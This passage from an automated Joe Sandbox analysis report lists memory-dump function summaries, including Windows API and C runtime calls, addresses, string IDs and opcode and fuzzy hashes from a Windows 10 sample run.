                                                                      • Snapshot File: hcaresult_26_2_1f5a000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$'$P$X
                                                                      • API String ID: 0-2666944636
                                                                      • Opcode ID: 4e2fac74f183a0bdaeb81c39fa4a1a7caa1bcb1f63f0039fea8e759a22399ee3
                                                                      • Instruction ID: 4a6fb49fa2d174438a534c2e662b8c53ffa9d8ad2de20fb034e95ed038d65917
                                                                      • Opcode Fuzzy Hash: 4e2fac74f183a0bdaeb81c39fa4a1a7caa1bcb1f63f0039fea8e759a22399ee3
                                                                      • Instruction Fuzzy Hash: 6241493040CF158BC719DA2DE9DA9BBF7E5EB85311F60472ED5DB83092D3286617CA82
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?), ref: 00DDF25A
                                                                      • _malloc.LIBCMT ref: 00DDF293
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,00DD9E02,?,?), ref: 00DDF2C6
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00DD9E02,?,?), ref: 00DDF2E2
                                                                      • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00DDF31C
                                                                      • _malloc.LIBCMT ref: 00DDF355
                                                                      • __freea.LIBCMT ref: 00DDF3AD
                                                                      • __freea.LIBCMT ref: 00DDF3B6
                                                                      • _malloc.LIBCMT ref: 00DDF46B
                                                                      • _memset.LIBCMT ref: 00DDF48D
                                                                      • __freea.LIBCMT ref: 00DDF4D8
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea_malloc$_memset
                                                                      • String ID:
                                                                      • API String ID: 3920393152-0
                                                                      • Opcode ID: 78f2b261489d81dc67da15cae015f47074221d597052c3210b6fe4f0505e4557
                                                                      • Instruction ID: 35bbb2e4f4cbf86282dc57895059c903e7056ff1b2c3bff2492ee5e9e56f2a10
                                                                      • Opcode Fuzzy Hash: 78f2b261489d81dc67da15cae015f47074221d597052c3210b6fe4f0505e4557
                                                                      • Instruction Fuzzy Hash: 15C18B7280015AEFCF21AFA4DC818AE7BA9EF48354B19453BF946A6360D731CD91DB70
                                                                      APIs
                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00DDA861), ref: 00DDBA60
                                                                      • __init_pointers.LIBCMT ref: 00DDBA6A
                                                                      • __mtterm.LIBCMT ref: 00DDBB20
                                                                        • Part of subcall function 00DDB649: TlsFree.KERNEL32(00DEC65C,00DDA8F6), ref: 00DDB674
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FreeValue__init_pointers__mtterm
                                                                      • String ID: FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      • API String ID: 3928193026-1030280904
                                                                      • Opcode ID: a6a817d6a2310d2eac4f6c13956bcc307583335e20840f2ec44ea4596386d2f0
                                                                      • Instruction ID: dd22009c5e8ae079ec664e6d20e0e8559c7a4aacc637bcff7b88364857e4ddd2
                                                                      • Opcode Fuzzy Hash: a6a817d6a2310d2eac4f6c13956bcc307583335e20840f2ec44ea4596386d2f0
                                                                      • Instruction Fuzzy Hash: 01318D31840391DACB11BB75EC85A1A3BA4EB54378B1A853BE510CB3F1EB75C8428B71
                                                                      APIs
                                                                      • _strlen.LIBCMT ref: 00DE2355
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00DDF75E), ref: 00DE2395
                                                                      • _malloc.LIBCMT ref: 00DE23A5
                                                                      • _memset.LIBCMT ref: 00DE23CD
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00DDF75E,?), ref: 00DE23E4
                                                                      • __freea.LIBCMT ref: 00DE246C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                      • String ID:
                                                                      • API String ID: 3923921168-0
                                                                      • Opcode ID: be4d551d33c36eea7e6c63a34f385a49323da08bab55d5247cc83324d7c11a3a
                                                                      • Instruction ID: 10b4959cd59a7458fea595c2c6e96ae7ae77a1c03fa3125eb3c5a3ada5352564
                                                                      • Opcode Fuzzy Hash: be4d551d33c36eea7e6c63a34f385a49323da08bab55d5247cc83324d7c11a3a
                                                                      • Instruction Fuzzy Hash: 0F516F31900259AACF21AFA6DC44DFFBBB9EF99720F28411AF514A6290D7359C41CF70
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: String___crt$Type_memset
                                                                      • String ID:
                                                                      • API String ID: 1957702402-3916222277
                                                                      • Opcode ID: 4facfc0e34130c712d2ff623d8cbfbe7c870751cf2b616df665596082eb4f2bd
                                                                      • Instruction ID: ae8587ba7f3da10a8378874b6f466e86ccb32d4aae5ef14f71ec08e31068b31d
                                                                      • Opcode Fuzzy Hash: 4facfc0e34130c712d2ff623d8cbfbe7c870751cf2b616df665596082eb4f2bd
                                                                      • Instruction Fuzzy Hash: 3651247410479C5FDB228B2C9C94FFB7BE9DB05304F1884EAD5C68B282E2319A498F31
                                                                      APIs
                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 00DE4BC1
                                                                      • __FindPESection.LIBCMT ref: 00DE4BDB
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                      • String ID:
                                                                      • API String ID: 876702719-0
                                                                      • Opcode ID: 810000f004f94c85e018f8a0ab1f527b30ccc731e129fcd6a8504954a44001f0
                                                                      • Instruction ID: 8249b7f543a05f6b8c85c463f424361b7a2182b7d465692690a86f9fca022743
                                                                      • Opcode Fuzzy Hash: 810000f004f94c85e018f8a0ab1f527b30ccc731e129fcd6a8504954a44001f0
                                                                      • Instruction Fuzzy Hash: AE91A432A003998BCB14EF5ADC8076DB7B5EB84714F5A4129E815DB3A1E735ED01CBB0
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00DDF75E,?,?,?), ref: 00DDF61A
                                                                      • _malloc.LIBCMT ref: 00DDF64F
                                                                        • Part of subcall function 00DE22D3: _strlen.LIBCMT ref: 00DE2355
                                                                        • Part of subcall function 00DE22D3: _memset.LIBCMT ref: 00DE23CD
                                                                        • Part of subcall function 00DE22D3: MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00DDF75E,?), ref: 00DE23E4
                                                                      • _memset.LIBCMT ref: 00DDF66F
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00DDF684
                                                                      • __freea.LIBCMT ref: 00DDF69C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$_memset$__freea_malloc_strlen
                                                                      • String ID:
                                                                      • API String ID: 574822426-0
                                                                      • Opcode ID: 02c6371aab659a2b11b5820a5d96bc5da52c4fcdb63fb4d00fdad98462ab4119
                                                                      • Instruction ID: 78ef70250cf96a068c81dee3d8c4c660c7e54301fa5728fd53b8e4e12531796e
                                                                      • Opcode Fuzzy Hash: 02c6371aab659a2b11b5820a5d96bc5da52c4fcdb63fb4d00fdad98462ab4119
                                                                      • Instruction Fuzzy Hash: E2516C7250025AAFDF10AFA4DC81DAE3BA9EB14354B18443BFA06D7360D771DD608BB0
                                                                      APIs
                                                                      • __CreateFrameInfo.LIBCMT ref: 00DE4031
                                                                        • Part of subcall function 00DE3921: __getptd.LIBCMT ref: 00DE392F
                                                                        • Part of subcall function 00DE3921: __getptd.LIBCMT ref: 00DE393D
                                                                      • __getptd.LIBCMT ref: 00DE403B
                                                                        • Part of subcall function 00DDB7E6: __amsg_exit.LIBCMT ref: 00DDB7F6
                                                                      • __getptd.LIBCMT ref: 00DE4049
                                                                      • __getptd.LIBCMT ref: 00DE4057
                                                                      • __getptd.LIBCMT ref: 00DE4062
                                                                        • Part of subcall function 00DE39C6: __CallSettingFrame@12.LIBCMT ref: 00DE3A12
                                                                        • Part of subcall function 00DE412F: __getptd.LIBCMT ref: 00DE413E
                                                                        • Part of subcall function 00DE412F: __getptd.LIBCMT ref: 00DE414C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit
                                                                      • String ID:
                                                                      • API String ID: 3174811152-0
                                                                      • Opcode ID: 00718d0e68132253fd1dc26ac8ec86370d79eb46a5bc2db11c5e977857a907f3
                                                                      • Instruction ID: cd598a2afd745ad6454b8920596fd8e949f781c0d581536c823e2a1c03338dd3
                                                                      • Opcode Fuzzy Hash: 00718d0e68132253fd1dc26ac8ec86370d79eb46a5bc2db11c5e977857a907f3
                                                                      • Instruction Fuzzy Hash: 4511E471C0434AEFDB00EFA4C985AAD7BB0FF04314F11806AE814A7252EB789A119F70
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00AD84C3
                                                                      • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,00AD8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00AD84F7
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AD1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_ad1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationLogicalProcessor
                                                                      • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                      • API String ID: 1773637529-812649623
                                                                      • Opcode ID: 4530c332cd549a485110a2ce9b79bb96940393db82cbc586c8bf7026f35ed180
                                                                      • Instruction ID: 3b7bec0fde5e98bc8a64dab64e5f0f55e4c4f3466cb038813985b86e291e5fb6
                                                                      • Opcode Fuzzy Hash: 4530c332cd549a485110a2ce9b79bb96940393db82cbc586c8bf7026f35ed180
                                                                      • Instruction Fuzzy Hash: 9E11B2B1D44208BFEB10EBA4EE42B6DB7E8EF04B10F2444A7E40692381DF399A80C615
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00AD84C3
                                                                      • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,00AD8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00AD84F7
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AD1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_ad1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationLogicalProcessor
                                                                      • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                      • API String ID: 1773637529-812649623
                                                                      • Opcode ID: 1e656101392fb9e3823d893838b269b172fbbffbf9b641bbf4f3e5127c996ed9
                                                                      • Instruction ID: 94edd6890efd377b01cd5041b6957d3daef5ef0a07bfb068d222d860e62fa5fe
                                                                      • Opcode Fuzzy Hash: 1e656101392fb9e3823d893838b269b172fbbffbf9b641bbf4f3e5127c996ed9
                                                                      • Instruction Fuzzy Hash: 7E01B5B0D44208BFEB10EBA4EE42A6DB7E8EF04B10F104567F416D7391EE79DE808614
                                                                      APIs
                                                                      • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00ADC871
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00ADC8CF
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00ADC92C
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00ADC95F
                                                                        • Part of subcall function 00ADC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00ADC8DD), ref: 00ADC833
                                                                        • Part of subcall function 00ADC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00ADC8DD), ref: 00ADC850
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AD1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_ad1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Thread$LanguagesPreferred$Language
                                                                      • String ID:
                                                                      • API String ID: 2255706666-0
                                                                      • Opcode ID: c9c88f86ea3451557c1d0802225e59a3c9d9c7622679081cf5d1f4ff987b1866
                                                                      • Instruction ID: cbfb789c8842579ce11f35d3d915ee942519bbfefa3273eae2f4765b2bd2e4c5
                                                                      • Opcode Fuzzy Hash: c9c88f86ea3451557c1d0802225e59a3c9d9c7622679081cf5d1f4ff987b1866
                                                                      • Instruction Fuzzy Hash: 8B315A70E0021E9BDB10DFE8C895AAEB7B8FF04320F404266E566E7391DB749A04CB90
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(00000000,?,00DDB635), ref: 00DDB5AC
                                                                      • TlsGetValue.KERNEL32(00DEC658,?,00DDB635), ref: 00DDB5C3
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: DecodePointer$KERNEL32.DLL
                                                                      • API String ID: 3702945584-629428536
                                                                      • Opcode ID: 3136b23a42bb024e745d37c7689a5889e0022977e277cd961263bd0fbe642121
                                                                      • Instruction ID: ffd358f5f39bcf5b4e2f5c3ed42d1edc693ed3b69ad538ca8a28b0f220192295
                                                                      • Opcode Fuzzy Hash: 3136b23a42bb024e745d37c7689a5889e0022977e277cd961263bd0fbe642121
                                                                      • Instruction Fuzzy Hash: F701D420544795EBDB21AB7AEC45E9B3F988F023B871D0667FD04CB3A1DB21C90186F0
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(00000000,?,00DDB598,00000000,00DE273C,00DEF6D0,00000000,00000314,?,00DE0261,00DEF6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00DDB531
                                                                      • TlsGetValue.KERNEL32(00DEC658,?,00DDB598,00000000,00DE273C,00DEF6D0,00000000,00000314,?,00DE0261,00DEF6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00DDB548
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: EncodePointer$KERNEL32.DLL
                                                                      • API String ID: 3702945584-3682587211
                                                                      • Opcode ID: 856051737404de8f13b99ad82ea5a1a6f969cf77f6c04d6c2450d07a0849cf42
                                                                      • Instruction ID: 50145bd1c3cc2baaa0d8501f9bc6961e42b7bc6e7a3c8fe8155674cfa34c11c4
                                                                      • Opcode Fuzzy Hash: 856051737404de8f13b99ad82ea5a1a6f969cf77f6c04d6c2450d07a0849cf42
                                                                      • Instruction Fuzzy Hash: 1EF04F30500256EA8B11BF39EC409AA3BA89B053B475A0167FD18DA7A0DB31DD4187F0
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallFrame@12Setting__getptd
                                                                      • String ID: j
                                                                      • API String ID: 3454690891-2137352139
                                                                      • Opcode ID: 897189d18653c473b9fdc1a94212da5d9a7baed4e9301db53569ff7429da2283
                                                                      • Instruction ID: 0a084e2395875ab7e38f10a51a342539080bda033fc2011f1c23e6e622efd3a7
                                                                      • Opcode Fuzzy Hash: 897189d18653c473b9fdc1a94212da5d9a7baed4e9301db53569ff7429da2283
                                                                      • Instruction Fuzzy Hash: BD118271904291DFCB12EF6AC8483ACBFB0FF05714F18468AE4946F183C375AA51CBA1
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBCMT ref: 00DE43C9
                                                                        • Part of subcall function 00DE4324: ___BuildCatchObjectHelper.LIBCMT ref: 00DE435A
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00DE43E0
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                      • String ID: csm
                                                                      • API String ID: 3487967840-1018135373
                                                                      • Opcode ID: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                      • Instruction ID: 92f4a23a8a68ffc4756aee0c8bd14aed92ce9e66b2531cc699b6563f10b9cfff
                                                                      • Opcode Fuzzy Hash: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                      • Instruction Fuzzy Hash: A2014231000189BBCF12AF62CC46EEA3FAAEF08341F048014FD0816121D772E9B1EBB4
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00DE413E
                                                                        • Part of subcall function 00DDB7E6: __amsg_exit.LIBCMT ref: 00DDB7F6
                                                                      • __getptd.LIBCMT ref: 00DE414C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd$__amsg_exit
                                                                      • String ID: csm
                                                                      • API String ID: 1969926928-1018135373
                                                                      • Opcode ID: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                      • Instruction ID: 943cd32bffdbee09ee8809bbc1cdcd1df01da6c9c31e4abe57d365ab56c178ab
                                                                      • Opcode Fuzzy Hash: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                      • Instruction Fuzzy Hash: 5C014B358017859FDF34AFA7D4446ADB7B5AF24311F18446EE04056292CB309AC0DF71